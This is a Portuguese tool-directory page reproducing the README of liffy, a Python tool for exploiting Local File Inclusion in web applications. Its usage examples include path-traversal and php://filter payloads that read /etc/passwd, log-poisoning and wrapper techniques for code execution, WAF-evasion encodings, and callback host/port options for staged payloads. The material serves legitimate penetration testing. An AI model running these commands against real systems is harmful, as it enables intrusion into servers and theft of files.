Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/mzfr/liffy
Análise de VulnerabilidadesExploração de Aplicações WebBypass de WAFTestes de PenetraçãoDesenvolvimento de Payloads
GitHubmzfr/liffy

liffy

Ferramenta de exploração de inclusão de arquivo local

Ver Repositório
97811454há 4 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

GitSpo Mentions License: GPL v3 Maintenance Rawsec's CyberSecurity Inventory

Packaging status


liffy

Ferramenta Avançada de Exploração de LFI

Baixar ferramenta

liffy em ação

Uma poderosa ferramenta Python para exploração de Inclusão Local de Arquivos (LFI) com recursos avançados incluindo bypass de WAF, técnicas de codificação e detecção abrangente de vulnerabilidades.

Liffy v2.0 é a versão significativamente aprimorada do liffy que foi originalmente criado por rotlogix/liffy. Esta versão inclui recursos modernos como saída de terminal Rich, configuração YAML, threading aprimorado e múltiplas técnicas avançadas de exploração.

⚠️ Muitas mudanças novas foram codificadas no estilo vibe.

Índice

  • Funcionalidades
  • Instalação
  • Uso
  • Configuração
  • Técnicas Avançadas
  • Exemplos
  • Contribuição
  • Créditos

Funcionalidades

Técnicas LFI Principais

  • data:// - Execução de código via wrapper data
  • expect:// - Execução de código via wrapper expect
  • input:// - Execução de código via wrapper input
  • filter:// - Leitura de arquivos arbitrários via wrapper filter
  • /proc/self/environ - Execução de código em modo CGI
  • Apache access.log poisoning - Exploração de arquivos de log
  • Linux auth.log SSH poisoning - Exploração de log SSH
  • Null Byte Poisoning - Ataques de byte nulo em PHP legado
  • ZIP wrapper exploitation - Ataques de inclusão de arquivo ZIP
  • Wrapper detection - Testes seguros para wrappers comuns de fluxo LFI
  • Out-of-band probes - Payloads de callback para comportamento cego de wrapper/SSRF
  • Blind LFI checks - Testes de diferença de resposta quando o conteúdo do arquivo não é refletido
  • Auto scan mode - Plano de varredura seguro com detecção primeiro, abrangendo traversal, wrappers e verificações cegas

Recursos Avançados

  • Evasão de WAF - Múltiplas técnicas de bypass para WAFs comuns
  • Codificação Avançada - Codificação URL dupla, Unicode, variações de maiúsculas/minúsculas
  • Suporte a Requisições POST - Suporte completo ao método POST com dados personalizados
  • Cabeçalhos Personalizados - Cabeçalhos HTTP configuráveis
  • Rotação de User-Agent - User agents aleatórios para evitar detecção
  • Limitação de Taxa - Aceleração de requisições configurável
  • Multithreading - Gerenciamento aprimorado de pool de threads
  • Modo de Detecção - Varredura de vulnerabilidades sem exploração
  • Saída de Terminal Rich - Saída colorida e bonita com barras de progresso
  • Configuração YAML - Gerenciamento de configurações persistentes

Melhorias Modernas

  • Detecção Aprimorada de Vulnerabilidades - Análise avançada de respostas com pontuação de confiança
  • Gerenciamento de Pool de Threads - Desempenho otimizado com threading adaptativo
  • Gerenciamento de Configuração - Configurações baseadas em YAML com substituições via CLI
  • Registro Abrangente - Relatórios detalhados de execução e rastreamento de progresso

Instalação

Certifique-se de que está usando Python 3. O Liffy não suporta Python 2. Os exemplos abaixo usam uv run python para que os comandos sejam executados dentro do ambiente do projeto.

root@kitploit:~
# Install uv if you haven't already
curl -LsSf https://astral.sh/uv/install.sh | sh

# Clone the repository
git clone https://github.com/mzfr/liffy
cd liffy

# Create virtual environment with uv
uv venv

# Install dependencies from pyproject.toml
uv sync

# Run liffy
uv run python liffy.py --help

Uso

Sintaxe Básica

root@kitploit:~
uv run python liffy.py <URL> [OPTIONS]

Opções da Linha de Comando

root@kitploit:~
usage: liffy.py [-h] [-d] [-i] [-e] [-f] [-p] [-a] [-ns] [-r] [--ssh]
                [-l LOCATION] [--cookies COOKIES] [-dt] [-t THREADS]
                [--detection] [--null-byte] [--zip] [--encoding]
                [--waf-bypass] [--method {GET,POST}] [--post-data POST_DATA]
                [--headers HEADERS] [--lhost LHOST] [--lport LPORT]
                [--read-file READ_FILE] [-y] [--timeout TIMEOUT]
                [--proxy PROXY] [--verify-tls] [--user-agent USER_AGENT]
                [--oob] [--oob-url OOB_URL] [--blind] [--auto]
                [--delay DELAY] [--retries RETRIES] [--json] [--output OUTPUT]
                [--quiet] [--no-color] [--no-banner] [--config]
                [url]

positional arguments:
  url                   URL to test for LFI

Core Techniques:
  -d, --data            Use data:// technique
  -i, --input           Use input:// technique
  -e, --expect          Use expect:// technique
  -f, --filter          Use filter:// technique
  -p, --proc            Use /proc/self/environ technique
  -a, --access          Apache access logs technique
  --ssh                 SSH auth log poisoning
  -dt, --directorytraverse  Test for Directory Traversal
  --null-byte           Test for Null Byte Poisoning
  --zip                 Test for ZIP wrapper exploitation
  --wrappers, --wrapper Detect common LFI stream wrappers
  --wrapper-list WRAPPER_LIST
                        Path to custom wrapper probe payload list
  --oob                 Send out-of-band callback probes
  --oob-url OOB_URL     OOB callback base URL
  --blind               Run blind LFI response-difference checks
  --blind-list BLIND_LIST
                        Path to custom blind LFI probe list
  --auto                Run a safe automatic scan plan

Advanced Options:
  --encoding            Use advanced encoding/bypass techniques
  --waf-bypass          Use WAF evasion techniques
  --method {GET,POST}   HTTP method to use (default: GET)
  --post-data POST_DATA POST data (format: key=value&key2=value2)
  --headers HEADERS     Custom headers (format: Header1:Value1,Header2:Value2)
  --detection           Only perform LFI detection, no exploitation

Request Options:
  --timeout TIMEOUT     HTTP request timeout in seconds
  --proxy PROXY         HTTP(S) proxy URL, e.g. http://127.0.0.1:8080
  --verify-tls          Verify TLS certificates instead of using insecure requests
  --user-agent UA       Custom User-Agent header
  --delay DELAY         Delay between requests in seconds
  --retries RETRIES     HTTP retries per request

Automation Options:
  --lhost LHOST         Callback host for staged payloads
  --lport LPORT         Callback port for staged payloads
  --read-file PATH      File path to read with filter://
  -y, --yes             Use defaults for prompts and run non-interactively
  --json                Print a JSON run summary
  --output OUTPUT       Write JSON run summary to a file
  --quiet               Suppress normal terminal output

General Options:
  -ns, --nostager       Execute payload directly, do not use stager
  -r, --relative        Use path traversal sequences for attack
  -l, --location LOCATION  Path to target file (access log, auth log, etc.)
  --cookies COOKIES     Session cookies for authentication
  -t, --threads THREADS Number of threads to use (default: 5)
  --no-color            Disable colored output
  --no-banner           Disable banner display
  --config              Create default YAML configuration file

Configuração

Configuração YAML

Crie um arquivo de configuração para configurações persistentes:

root@kitploit:~
uv run python liffy.py --config

Isso cria liffy_config.yaml com as configurações padrão:

root@kitploit:~
# Liffy Configuration File
max_threads: 5
rate_limit_delay: 0.1
disable_colors: false
disable_banner: false
quiet: false
default_method: GET
user_agent_rotation: true
request_timeout: 15
proxy: null
verify_tls: false
retries: 0

Defina disable_banner: true para ocultar o banner/logo de inicialização por padrão. As flags da CLI ainda substituem os valores de configuração, então você também pode usar --no-banner, --no-color ou --quiet para execuções pontuais.

Variáveis de Ambiente

Você também pode usar variáveis de ambiente:

  • LIFFY_THREADS - Número de threads
  • LIFFY_RATE_LIMIT - Atraso da limitação de taxa
  • LIFFY_NO_COLOR - Desabilitar cores (true/false)

Técnicas Avançadas

Técnicas de Bypass de WAF

Quando --waf-bypass está habilitado, o liffy aplica automaticamente múltiplas técnicas de evasão:

  • Injeção de Comentários: /**/, #, ;
  • Confusão de Protocolo: file:///, pHp://
  • Camadas de Codificação: Múltiplas combinações de codificação
  • Ofuscação de Caminho: ./, ../, bytes nulos

Técnicas de Bypass por Codificação

Com --encoding, o liffy aplica métodos avançados de codificação:

  • Codificação URL Dupla: %252e%252e%252f
  • Codificação Unicode: \u002e\u002e\u002f
  • Caixa Mista: ..%2F, ..%2f
  • Codificação de Entidade HTML: &#46;&#46;&#47;

Suporte a Requisições POST

root@kitploit:~
# POST com dados de formulário
uv run python liffy.py "http://target.com/lfi.php" -d --method POST --post-data "file=../../etc/passwd"

# POST com cabeçalhos personalizados
uv run python liffy.py "http://target.com/lfi.php" -d --method POST --headers "X-Forwarded-For:127.0.0.1,Authorization:Bearer token123"

Ajuste de Requisições

root@kitploit:~
# Enviar tráfego através de um proxy local e repetir falhas transitórias
uv run python liffy.py "http://target.com/lfi.php?file=" -d \
  --proxy "http://127.0.0.1:8080" --timeout 20 --retries 2

# Usar um User-Agent fixo e atraso personalizado entre requisições
uv run python liffy.py "http://target.com/lfi.php?file=" --detection -f \
  --user-agent "liffy/2.0" --delay 0.5

Exemplos

Testes Básicos de LFI

Testar com wrapper data://

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d

Testar com múltiplas técnicas

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d -i -e -f

Apenas modo de detecção

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --detection -d -i -e

Uso Avançado

Bypass de WAF com codificação

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d --waf-bypass --encoding

Multithread com limitação de taxa

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d -t 10 --config

Requisição POST com cabeçalhos personalizados

root@kitploit:~
uv run python liffy.py "http://example.com/upload.php" -d --method POST \
  --post-data "action=read&file=../../etc/passwd" \
  --headers "User-Agent:Mozilla/5.0,X-Forwarded-For:192.168.1.1"

Envenenamento de Log

Envenenamento do access.log do Apache

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -a

Envenenamento do auth.log SSH

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --ssh

Localização personalizada do log

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -a -l "/var/log/apache2/access.log"

Directory Traversal

Path traversal relativo

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d -r

Teste de directory traversal

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -dt

Técnicas Especiais

Null byte poisoning (PHP legado)

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --null-byte

Exploração de wrapper ZIP

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --zip

Detecção de wrappers comuns

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --wrappers

A detecção de wrappers usa probes seguros padrão para file://, php://filter, data://, php://temp, php://memory e wrappers relacionados. zip://, phar:// e glob:// são tratados como informativos/condicionais porque geralmente requerem arquivos do lado do alvo ou comportamento de sink que exponha listagens.

Você pode fornecer uma lista personalizada de payloads de wrapper. Se --wrapper-list for omitido, o liffy usa os probes embutidos:

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --wrapper \
  --wrapper-list payload_wordlists/wrappers.txt

Cada linha não vazia pode ser um payload bruto ou nome=payload:

root@kitploit:~
php-filter-passwd=php://filter/read=convert.base64-encode/resource=/etc/passwd
file-winini=file:///c:/windows/win.ini

Out-of-band callback probes

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --oob \
  --oob-url "https://example.oast.site"

Use isso com um listener de callback HTTP/DNS. O liffy envia payloads no estilo wrapper de URL e você verifica se o alvo chamou de volta.

Verificações cegas de LFI

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --blind

Verificações cegas comparam probes de arquivos existentes com baselines de arquivos ausentes aleatórios e relatam diferenças de status, comprimento ou tempo quando o conteúdo não é refletido diretamente.

Você pode fornecer uma lista personalizada de probes cegos. Se --blind-list for omitido ou vazio, o liffy usa os probes embutidos:

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --blind \
  --blind-list payload_wordlists/blind_lfi.txt

Cada linha não vazia pode ser um payload bruto ou nome=payload:

root@kitploit:~
linux-passwd=/etc/passwd
proc-environ=/proc/self/environ
laravel-env=.env

Varredura automática segura

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --auto

--auto habilita directory traversal apenas para detecção, verificações de wrapper e verificações cegas. Se --oob-url também for fornecido, inclui probes OOB.

Varredura abrangente com todas as técnicas

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" \
  -d -i -e -f -p -a --ssh -dt --null-byte --zip --wrappers --blind \
  --encoding --waf-bypass --detection

Autenticação e Cookies

Usando cookies de sessão

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d \
  --cookies "PHPSESSID=abc123; auth_token=xyz789"

Uso em Script / Não Interativo

Fornecer valores de callback sem prompts

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d \
  --lhost 10.10.14.2 --lport 4444 --yes

Ler um arquivo específico com filter:// sem prompt

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -f \
  --read-file /etc/passwd --yes

Saída Estruturada

Imprimir um resumo da execução em JSON

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --detection -f --json

Escrever um resumo JSON em disco mantendo a saída do terminal

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --detection -f \
  --output findings.json

Controle de Saída

Desabilitar cores e banner

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" -d --no-color --no-banner

Suprimir a saída normal do terminal

root@kitploit:~
uv run python liffy.py "http://example.com/page.php?file=" --detection -f --quiet --output findings.json

Locais de Arquivo Padrão

Os seguintes locais padrão são usados quando nenhum caminho personalizado é especificado:

  • SSH auth.log: /var/log/auth.log
  • Apache access.log: /var/log/apache2/access.log
  • Log Apache alternativo: /var/log/httpd/access_log

Contribuição

Aceitamos contribuições! Veja como você pode ajudar:

Sugestões de Funcionalidades

  • Novas técnicas de exploração LFI
  • Métodos adicionais de bypass de WAF
  • Técnicas de codificação aprimoradas
  • Otimização de payloads
  • Melhorias na detecção

Relatórios de Bugs

  • Reporte problemas via GitHub Issues
  • Inclua etapas detalhadas de reprodução
  • Forneça detalhes do ambiente alvo

Pull Requests

  • Faça um fork do repositório
  • Crie um branch de funcionalidade
  • Faça suas alterações com testes
  • Submeta um pull request

Sinta-se à vontade para abrir uma issue para qualquer dúvida ou sugestão!

Detecção de Vulnerabilidades

O modo de detecção do Liffy fornece análise abrangente de vulnerabilidades:

Pontuação de Confiança

  • Alta Confiança (80-100%): Fortes indicadores como conteúdo de /etc/passwd
  • Confiança Média (50-79%): Conteúdo parcial de arquivo ou respostas suspeitas
  • Baixa Confiança (20-49%): Indicadores potenciais que exigem verificação manual

Recursos de Detecção

  • Análise de Conteúdo de Arquivo: Reconhece padrões de arquivos Linux, Windows e PHP
  • Análise de Resposta: Códigos de status HTTP, tamanho do conteúdo, análise de tempo
  • Detecção de WAF: Identifica assinaturas comuns de WAF
  • Coleta de Evidências: Captura prova de vulnerabilidade para relatórios

Exemplo de Saída de Detecção

root@kitploit:~
[+] VULNERABILITY SUMMARY
==================================================
[1] Vulnerability Found
    Payload: ../../etc/passwd
    Confidence: 85%
    Evidence: Linux /etc/passwd file: root:
    Status Code: 200
    Content Length: 1547

Solução de Problemas

Problemas Comuns

WAF Bloqueando Requisições

root@kitploit:~
# Use técnicas de bypass de WAF
uv run python liffy.py "http://target.com/lfi.php" -d --waf-bypass

# Reduza o número de threads e aumente os atrasos
uv run python liffy.py "http://target.com/lfi.php" -d -t 1

Problemas de Limitação de Taxa

root@kitploit:~
# Aumente o atraso no arquivo de configuração
max_threads: 2
rate_limit_delay: 1.0

Modo de Depuração

Para saída detalhada, você pode modificar a configuração:

root@kitploit:~
debug_mode: true
verbose_output: true

Aviso de Segurança

O Liffy foi projetado apenas para testes de segurança autorizados.

  • Use apenas em sistemas que você possui ou tem permissão explícita para testar
  • Siga práticas de divulgação responsável
  • Respeite os limites de taxa e evite condições de DoS
  • Esteja ciente das implicações legais em sua jurisdição

Os autores não são responsáveis pelo uso indevido desta ferramenta.

Créditos

Inspiração Original

  • liffy original por hvqzao
  • Conceito inicial de rotlogix/liffy

Técnicas e Pesquisa

  • Técnicas de exploração LFI de várias pesquisas de segurança
  • Métodos de bypass de WAF de recursos públicos de segurança
  • Documentação de exploração de wrapper PHP

Design e Recursos

  • Design do logotipo do renderforest
  • Estilização do terminal usando a biblioteca Rich

Licença

Este projeto está licenciado sob a GNU General Public License v3.0 - consulte o arquivo LICENSE para obter detalhes.